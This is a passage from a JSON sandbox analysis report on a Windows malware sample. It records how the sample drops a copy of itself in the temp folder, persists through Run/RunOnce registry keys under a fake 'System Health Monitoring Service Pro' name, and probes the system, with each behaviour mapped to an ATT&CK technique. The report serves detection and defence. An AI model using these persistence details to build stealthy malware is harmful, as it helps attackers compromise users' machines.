\"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"C5571B0A43BBAEE5653D0F9B6FC7F9C960EA665FCB868D75D8890A1A5D0E0DE0\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" queries volume information of \"C:\\\" at 00000000-00005772-0000010C-165804\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005784-0000010C-265232\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006064-0000010C-307339", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" queries volume information of \"C:\\\" at 00000000-00005772-0000010C-165804\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005784-0000010C-265232\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006064-0000010C-307339", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006600c05d6600bb5d6600000000000000000000006300000000019cdd22000000000000eb220095e17377ca3a0700feffffff435c777750597777aa000000b8000000ba5d6600b85d660024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c767760d86675ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed7777e25d6600a06a4d758600000024df22005ce322000000000086008800a06a4d7524df2200916c4d75e25d6600a06a4d75a06a4d7594e3220002020000 (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005772)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e00301d2e002b1d2e00000000000000000000002b00000000019cdc22000000000000ea220095e173774a380700feffffff435c777750597777aa000000b80000002a1d2e00281d2e0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c767760d86675ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed7777521d2e00a06a4d758600000024de22005ce222000000000086008800a06a4d7524de2200916c4d75521d2e00a06a4d75a06a4d7594e2220002020000 (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf007877d6007877d6df527770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00005784)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005772)\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005772)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has a section named \".eh_fram\"\n \"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0.exe\" wrote 16256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00006064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"c5571b0a43bbaee5653d0f9b6fc7f9c960ea665fcb868d75d8890a1a5d0e0de0\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", 